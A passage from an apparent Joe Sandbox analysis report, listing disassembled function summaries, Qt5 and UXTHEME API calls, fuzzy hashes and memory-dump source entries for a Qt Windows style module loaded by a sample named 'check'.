                                                                                                                                                                                                                • ?cast@QMetaObject@@QEBAPEBVQObject@@PEBV2@@Z.QT5CORE(?,?,?,00007FFAFDF18DFD), ref: 00007FFAFDF251CD
                                                                                                                                                                                                                • ?cast@QMetaObject@@QEBAPEBVQObject@@PEBV2@@Z.QT5CORE(?,?,?,00007FFAFDF18DFD), ref: 00007FFAFDF251E2
                                                                                                                                                                                                                • ?cast@QMetaObject@@QEBAPEBVQObject@@PEBV2@@Z.QT5CORE(?,?,?,00007FFAFDF18DFD), ref: 00007FFAFDF251F7
                                                                                                                                                                                                                • ?cast@QMetaObject@@QEBAPEBVQObject@@PEBV2@@Z.QT5CORE(?,?,?,00007FFAFDF18DFD), ref: 00007FFAFDF2520C
                                                                                                                                                                                                                • ?cast@QMetaObject@@QEBAPEBVQObject@@PEBV2@@Z.QT5CORE(?,?,?,00007FFAFDF18DFD), ref: 00007FFAFDF25221
                                                                                                                                                                                                                • ?cast@QMetaObject@@QEBAPEBVQObject@@PEBV2@@Z.QT5CORE(?,?,?,00007FFAFDF18DFD), ref: 00007FFAFDF25236
                                                                                                                                                                                                                • ?setAttribute@QWidget@@QEAAXW4WidgetAttribute@Qt@@_N@Z.QT5WIDGETS(?,?,?,00007FFAFDF18DFD), ref: 00007FFAFDF2524B
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Object@@$?cast@MetaV2@@$Theme$?instance@?setActiveApplication@@Attribute@CoreDarkDeleteMode@ObjectPrivate@@StyleThemedWidget@@WindowWindows$CloseDataDestroyOpacity@Qt@@_SelectWidgetmemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3088586464-0
                                                                                                                                                                                                                • Opcode ID: 2784440abc1013224ad6d8a18867aac1c3947dc10ad7593ef7c70c76c0b5eb96
                                                                                                                                                                                                                • Instruction ID: b568efd5642191a9be922e45556fbe9d179934ee2c012fcec34cddf264dac1c1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2784440abc1013224ad6d8a18867aac1c3947dc10ad7593ef7c70c76c0b5eb96
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A61D921A0964282FB579F51A845A793360AF57BA6B08D037CD7E0E3E5FE2CB44483A0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF25280: IsThemeActive.UXTHEME(?,?,?,?,00007FFAFDF11952), ref: 00007FFAFDF25288
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF25280: IsAppThemed.UXTHEME(?,?,?,?,00007FFAFDF11952), ref: 00007FFAFDF25292
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF25280: ?instance@QCoreApplication@@SAPEAV1@XZ.QT5CORE(?,?,?,?,00007FFAFDF11952), ref: 00007FFAFDF2529C
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF25280: ?isDarkMode@QWindowsStylePrivate@@SA_NXZ.QT5WIDGETS(?,?,?,?,00007FFAFDF11952), ref: 00007FFAFDF252A7
                                                                                                                                                                                                                • ?standardIcon@QWindowsStyle@@UEBA?AVQIcon@@W4StandardPixmap@QStyle@@PEBVQStyleOption@@PEBVQWidget@@@Z.QT5WIDGETS ref: 00007FFAFDF17D2F
                                                                                                                                                                                                                • GetThemePartSize.UXTHEME ref: 00007FFAFDF17DF1
                                                                                                                                                                                                                • ?toPoint@QPointF@@QEBA?AVQPoint@@XZ.QT5CORE ref: 00007FFAFDF17E22
                                                                                                                                                                                                                • ??0QIcon@@QEAA@XZ.QT5GUI ref: 00007FFAFDF17E2D
                                                                                                                                                                                                                • ??0QPixmap@@QEAA@AEBVQSize@@@Z.QT5GUI ref: 00007FFAFDF17E3C
                                                                                                                                                                                                                • ??0QColor@@QEAA@W4GlobalColor@Qt@@@Z.QT5GUI ref: 00007FFAFDF17E4B
                                                                                                                                                                                                                • ?fill@QPixmap@@QEAAXAEBVQColor@@@Z.QT5GUI ref: 00007FFAFDF17E59
                                                                                                                                                                                                                • ??0QPainter@@QEAA@PEAVQPaintDevice@@@Z.QT5GUI ref: 00007FFAFDF17E68
                                                                                                                                                                                                                • ??0QRect@@QEAA@AEBVQPoint@@AEBVQSize@@@Z.QT5CORE ref: 00007FFAFDF17E8B
                                                                                                                                                                                                                • ?addPixmap@QIcon@@QEAAXAEBVQPixmap@@W4Mode@1@W4State@1@@Z.QT5GUI ref: 00007FFAFDF17EC2
                                                                                                                                                                                                                • ??0QColor@@QEAA@W4GlobalColor@Qt@@@Z.QT5GUI ref: 00007FFAFDF17ED1
                                                                                                                                                                                                                • ?fill@QPixmap@@QEAAXAEBVQColor@@@Z.QT5GUI ref: 00007FFAFDF17EDF
                                                                                                                                                                                                                • ?addPixmap@QIcon@@QEAAXAEBVQPixmap@@W4Mode@1@W4State@1@@Z.QT5GUI ref: 00007FFAFDF17F0B
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Pixmap@@$Icon@@$Pixmap@$?add?fill@Color@Color@@Color@@@GlobalMode@1@Point@@Qt@@@Size@@@State@1@@StyleStyle@@ThemeWindows$?instance@?standardActiveApplication@@CoreDarkDevice@@@Icon@Mode@Option@@PaintPainter@@PartPointPoint@Private@@Rect@@SizeStandardThemedWidget@@@
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 530862341-0
                                                                                                                                                                                                                • Opcode ID: 9e10746b04a4429cc793a12ae4d87107b4df8affb19c0b1db5f09e06b2748e7d
                                                                                                                                                                                                                • Instruction ID: d95c2191205e3c7953cbbfbaa4d8f4fb89a431439727b3f88554dd2fa57fbea0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e10746b04a4429cc793a12ae4d87107b4df8affb19c0b1db5f09e06b2748e7d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6291D632A18B46C6E711DF21E8409ED7370FB96759F508122DE6D1B9A8EF3CE54AC780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Region@@$ClipRect@@$?setOperation@Painter@@Qt@@@RegionStyleType@0@@V0@@lstrcmp$?rect@Char@@Char@@@CurrentFrame@@Latin1NameOptionOption@@Rect@Region@ThemeWidgetWidget@@
                                                                                                                                                                                                                • String ID: Luna.msstyles$Metallic
                                                                                                                                                                                                                • API String ID: 481824375-1662128400
                                                                                                                                                                                                                • Opcode ID: 6c157ab8282ca6935ac5aa13b70c59d0ab73f2b9a2354d63d8554d93d975ac15
                                                                                                                                                                                                                • Instruction ID: 4afd5fa2fb53b70f9905b352c2b1bc76aab001a64281c9c85c529c0bc0d2b339
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c157ab8282ca6935ac5aa13b70c59d0ab73f2b9a2354d63d8554d93d975ac15
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0051B832608A82C6EB11CF64E8509ED3770FF46B99F408032DA6E4B6A8EF3CD549C750
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Color$Palette@@$Brush@@$Color@@$Group@1@Object@@$V0@@$?cast@?color@?setBrushBrush@Brush@@@Item@@MetaOptionQt@@@Role@1@Role@1@@StyleStyle@V2@@View$?brush@?darker@?selectionAbstractItemMode@Mode@1@SelectionView@@
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2823362239-0
                                                                                                                                                                                                                • Opcode ID: 4c4864e27856727efc6a61dc79d757c57fa43a5da8b964370d82ac28dac8d537
                                                                                                                                                                                                                • Instruction ID: 41d6e7f105d582d211d280a387ad9c018b596046e615e22884f6304cb65370c9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c4864e27856727efc6a61dc79d757c57fa43a5da8b964370d82ac28dac8d537
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5415531A1465386DB12DF11E8549BD7370FB86B65F408036DE6E4B6A8EF3CE609CB90
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?proxy@QStyle@@QEBAPEBV1@XZ.QT5WIDGETS ref: 00007FFAFDF1B35D
                                                                                                                                                                                                                • ?proxy@QStyle@@QEBAPEBV1@XZ.QT5WIDGETS ref: 00007FFAFDF1B46A
                                                                                                                                                                                                                • ?proxy@QStyle@@QEBAPEBV1@XZ.QT5WIDGETS ref: 00007FFAFDF1B56B
                                                                                                                                                                                                                • ?proxy@QStyle@@QEBAPEBV1@XZ.QT5WIDGETS ref: 00007FFAFDF1B5A8
                                                                                                                                                                                                                • ??UQRect@@QEBA?AV0@AEBV0@@Z.QT5CORE ref: 00007FFAFDF1B5E9
                                                                                                                                                                                                                • ?proxy@QStyle@@QEBAPEBV1@XZ.QT5WIDGETS ref: 00007FFAFDF1B5FD
                                                                                                                                                                                                                • ??UQRect@@QEBA?AV0@AEBV0@@Z.QT5CORE ref: 00007FFAFDF1B63A
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF19550: ?isActive@QPainter@@QEBA_NXZ.QT5GUI ref: 00007FFAFDF19595
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF19550: ?save@QPainter@@QEAAXXZ.QT5GUI ref: 00007FFAFDF195B5
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF19550: ?device@QPainter@@QEBAPEAVQPaintDevice@@XZ.QT5GUI ref: 00007FFAFDF195C1
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF19550: ?devicePixelRatioF@QPaintDevice@@QEBANXZ.QT5GUI ref: 00007FFAFDF195D6
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF19550: ?window@QWidget@@QEBAPEAV1@XZ.QT5WIDGETS ref: 00007FFAFDF195FB
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF19550: ?testAttribute_helper@QWidget@@AEBA_NW4WidgetAttribute@Qt@@@Z.QT5WIDGETS ref: 00007FFAFDF19609
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF19550: ?deviceTransform@QPainter@@QEBAAEBVQTransform@@XZ.QT5GUI ref: 00007FFAFDF19615
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF19550: ?type@QTransform@@QEBA?AW4TransformationType@1@XZ.QT5GUI ref: 00007FFAFDF19621
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF19550: ?opacity@QPainter@@QEBANXZ.QT5GUI ref: 00007FFAFDF196B1
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF19550: ?paintEngine@QPainter@@QEBAPEAVQPaintEngine@@XZ.QT5GUI ref: 00007FFAFDF19704
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF19550: ?paintDevice@QPaintEngine@@QEBAPEAVQPaintDevice@@XZ.QT5GUI ref: 00007FFAFDF1970D
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF19550: ?size@QBackingStore@@QEBA?AVQSize@@XZ.QT5GUI ref: 00007FFAFDF19741
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Painter@@$?proxy@PaintStyle@@$Device@@$?device?paintEngine@@Rect@@Transform@@V0@@Widget@@$?device@?opacity@?save@?size@?test?type@?window@Active@Attribute@Attribute_helper@BackingDevice@Engine@PixelQt@@@RatioSize@@Store@@Transform@TransformationType@1@Widget
                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                • API String ID: 1767250720-2766056989
                                                                                                                                                                                                                • Opcode ID: 2eb2fc1b89d3a4aab5883605f0217c8fbb41d2e168a36153538c454d3cc29cf9
                                                                                                                                                                                                                • Instruction ID: 20cd6aefc63fb591c06ce3b48e1c2eee4f57a0405024d3bd199dee25661e797d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2eb2fc1b89d3a4aab5883605f0217c8fbb41d2e168a36153538c454d3cc29cf9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0002E422A08781C6E7228F25D4447A937B0FB867A8F54913ADE6D1B7D4EF3CE541CB90
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Region@@$Object@@Painter@@Rect@@$Accessible@@@ClipHelper@@InstanceRegionRole@StyleType@0@@$??_6?inherits@?restore@?save@?setOperation@Point@@0@Qt@@@Region@ThemeV0@@
                                                                                                                                                                                                                • String ID: QTextEdit
                                                                                                                                                                                                                • API String ID: 4224864441-1621276798
                                                                                                                                                                                                                • Opcode ID: 36e9c9b5fb29f7f796b88c0683f7d4770743718a68bceb0ea0c2b0a7d13ec0dc
                                                                                                                                                                                                                • Instruction ID: 7b21471851742d38c7881485e906cb8013ca8d90a383bfe0c7ca808320333a6d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36e9c9b5fb29f7f796b88c0683f7d4770743718a68bceb0ea0c2b0a7d13ec0dc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98519732A08682C6EB02CF65E414AAD7770FB86769F408036DE6D5B7A4EF3CD545C750
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Painter@@$Paint$Device@@$?paintTransform@@$?device?type@BackingDevice@Engine@@Store@@TransformationType@1@Widget@@$?device@?opacity@?restore@?save@?size@?test?window@Active@Attribute@Attribute_helper@Engine@PixelQt@@@RatioSize@@Transform@Widget
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 156525822-0
                                                                                                                                                                                                                • Opcode ID: f785b273516815904cbbb09eaf6bd3aaef89aff95e34b1e7fb10eec919d039be
                                                                                                                                                                                                                • Instruction ID: a7ee35fec1d512e182498657e9acaf62bc26465056d430b777ad1a704646b116
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f785b273516815904cbbb09eaf6bd3aaef89aff95e34b1e7fb10eec919d039be
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C871A421D08A4685EB138B25A4155B96390FF57BA9F14C337DD7E2B6D0EF2CE49283A0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Painter@@$?draw$Line@@Lines@$Brush@@Color$?brush@?color@?restore@?save@?set?translate@Color@@Color@@@F@@@Group@1@Palette@@Pen@PointPoint@@Points@Role@1@@
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 632868398-0
                                                                                                                                                                                                                • Opcode ID: ec0b9e4875a35626ad787481799c39bf903070021dba9944962555a7e511fe70
                                                                                                                                                                                                                • Instruction ID: ff1e2cb86c9f147025bbc518400cc3b14fc0f6e4d7e1b645d59f44722ff3915a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ec0b9e4875a35626ad787481799c39bf903070021dba9944962555a7e511fe70
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F88140766087818BC725CF69E44095AFBB1F789760F00812ADBAA87B54EB7CE445CF10
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF217E0: ?parentWidget@QWidget@@QEBAPEAV1@XZ.QT5WIDGETS ref: 00007FFAFDF217F4
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF217E0: ?cast@QMetaObject@@QEBAPEBVQObject@@PEBV2@@Z.QT5CORE ref: 00007FFAFDF21804
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF217E0: ?palette@QWidget@@QEBAAEBVQPalette@@XZ.QT5WIDGETS ref: 00007FFAFDF21812
                                                                                                                                                                                                                • ?brush@QPalette@@QEBAAEBVQBrush@@W4ColorGroup@1@W4ColorRole@1@@Z.QT5GUI ref: 00007FFAFDF15EF8
                                                                                                                                                                                                                • ?fillRect@QPainter@@QEAAXAEBVQRect@@AEBVQBrush@@@Z.QT5GUI ref: 00007FFAFDF15F07
                                                                                                                                                                                                                • ?drawPrimitive@QWindowsStyle@@UEBAXW4PrimitiveElement@QStyle@@PEBVQStyleOption@@PEAVQPainter@@PEBVQWidget@@@Z.QT5WIDGETS ref: 00007FFAFDF15F87
                                                                                                                                                                                                                • ?proxy@QStyle@@QEBAPEBV1@XZ.QT5WIDGETS ref: 00007FFAFDF160F0
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Style@@$ColorObject@@Painter@@Palette@@Widget@@$?brush@?cast@?draw?fill?palette@?parent?proxy@Brush@@Brush@@@Element@Group@1@MetaOption@@PrimitivePrimitive@Rect@Rect@@Role@1@@StyleV2@@Widget@Widget@@@Windows
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3275618784-0
                                                                                                                                                                                                                • Opcode ID: d7353c7e1bfea933c912eacc27bbde75b736ff5e47b283adde53da226a7a8d56
                                                                                                                                                                                                                • Instruction ID: 6f3a643895311c62c4a9e8cc3e01cd960918f6bac36909056cc409c6fe534e04
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7353c7e1bfea933c912eacc27bbde75b736ff5e47b283adde53da226a7a8d56
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B061B432E086528AE7128B61D8405AD7770FB86765F40803AEE6E5BBD8EF3CD545C790
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Color@@$Painter@@$?setBrush@@ColorRect@@$?adjusted@?blue@?color@?darker@?draw?green@?red@?restore@?save@BrushBrush@Brush@@@Color@@@Group@1@Palette@@Pen@Qt@@@Rects@Role@1@@Style@Widget@@Window@
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1309040253-0
                                                                                                                                                                                                                • Opcode ID: 0b4b5d6bbde006c87cb7a5568188b9c3dc26477b2828ff20651058617986dc34
                                                                                                                                                                                                                • Instruction ID: 3db1544fcf8c4e5abc3c9afdae0b948e3a2fc81fa90b1d0728b7d7a15c2f2445
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b4b5d6bbde006c87cb7a5568188b9c3dc26477b2828ff20651058617986dc34
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36519732604A818AD722CF24EC55AED3760FB8A76AF408136DA6D4F7A4EF3CD145C790
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?unpolish@QWindowsStyle@@UEAAXPEAVQWidget@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFAFDF17486), ref: 00007FFAFDF220F0
                                                                                                                                                                                                                • ?cast@QMetaObject@@QEBAPEBVQObject@@PEBV2@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFAFDF17486), ref: 00007FFAFDF2210D
                                                                                                                                                                                                                • ?cast@QMetaObject@@QEBAPEBVQObject@@PEBV2@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFAFDF17486), ref: 00007FFAFDF22126
                                                                                                                                                                                                                • ?cast@QMetaObject@@QEBAPEBVQObject@@PEBV2@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFAFDF17486), ref: 00007FFAFDF2213F
                                                                                                                                                                                                                • ?cast@QMetaObject@@QEBAPEBVQObject@@PEBV2@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFAFDF17486), ref: 00007FFAFDF22154
                                                                                                                                                                                                                • ?cast@QMetaObject@@QEBAPEBVQObject@@PEBV2@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFAFDF17486), ref: 00007FFAFDF22169
                                                                                                                                                                                                                • ?cast@QMetaObject@@QEBAPEBVQObject@@PEBV2@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFAFDF17486), ref: 00007FFAFDF2217E
                                                                                                                                                                                                                • ?cast@QMetaObject@@QEBAPEBVQObject@@PEBV2@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFAFDF17486), ref: 00007FFAFDF22193
                                                                                                                                                                                                                • ?cast@QMetaObject@@QEBAPEBVQObject@@PEBV2@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFAFDF17486), ref: 00007FFAFDF221A8
                                                                                                                                                                                                                • ?cast@QMetaObject@@QEBAPEBVQObject@@PEBV2@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFAFDF17486), ref: 00007FFAFDF221BD
                                                                                                                                                                                                                • ?setAttribute@QWidget@@QEAAXW4WidgetAttribute@Qt@@_N@Z.QT5WIDGETS(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFAFDF17486), ref: 00007FFAFDF221D3
